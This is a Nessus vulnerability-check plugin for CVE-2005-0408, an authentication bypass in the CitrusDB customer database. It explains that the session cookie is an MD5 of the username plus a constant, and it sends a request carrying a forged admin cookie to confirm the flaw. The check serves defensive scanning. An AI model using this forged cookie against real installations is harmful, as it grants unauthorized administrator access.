#
# (C) Tenable Network Security
#

if(description)
{
 script_id(16477);
 script_version("$Revision: 1.5 $");

 script_cve_id("CVE-2005-0408");
 script_bugtraq_id(12560, 12557);

 name["english"] = "CitrusDB Remote Authentication Bypass Vulnerability";

 script_name(english:name["english"]);
 
 desc["english"] = "
Synopsis :

The remote host contains a PHP script that is affected by an
authentication bypass vulnerability. 

Description :

The remote host is running CitrusDB, an open-source customer database
application written in PHP. 

The version of CitrusDB installed on the remote host uses as an
authentication cookie the MD5 checksum of a username followed by the
constant 'boogaadeeboo'.  Knowing a valid username on the remote
install, an attacker may be able to leverage this issue to bypass
authentication and gain access as that user.  And in fact, Nessus has
managed to exploit this issue to log in as the user 'admin' which is
the default administrator name in CitrusDB. 

See also :

http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0264.html

Solution : 

Unknown at this time.

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";

 script_description(english:desc["english"]);
 
 summary["english"] = "Tries to authenticate to CitrusDB as admin";

 script_summary(english:summary["english"]);
 
 script_category(ACT_GATHER_INFO);
 
 script_copyright(english:"This script is Copyright (C) 2005-2008 Tenable Network Security");
 script_family(english:"CGI abuses");
 
 script_dependencies("http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);
if ( ! port ) exit(0);

if(!get_port_state(port))exit(0);
if(!can_host_php(port:port))exit(0);

function check(url)
{
 local_var req, res;
 global_var port;
 req = string ("GET ", url, "/main.php HTTP/1.1\r\n","Host: ", get_host_name(), "\r\n", "Cookie: user_name=admin; id_hash=4b3b2c8666298ae9771e9b3d38c3f26e\r\n\r\n");
 res = http_keepalive_send_recv(port:port, data:req);
 if ( res == NULL ) exit(0);
 if ( "<!-- Copyright (C) 2002  Paul Yasi <paul@citrusdb.org>, read the README file for more information -->" >< res ) 
 {
        security_hole(port);
        exit(0);
 }
}

check(url:"/citrusdb");
foreach dir ( cgi_dirs() )
{
  check(url:dir);
}
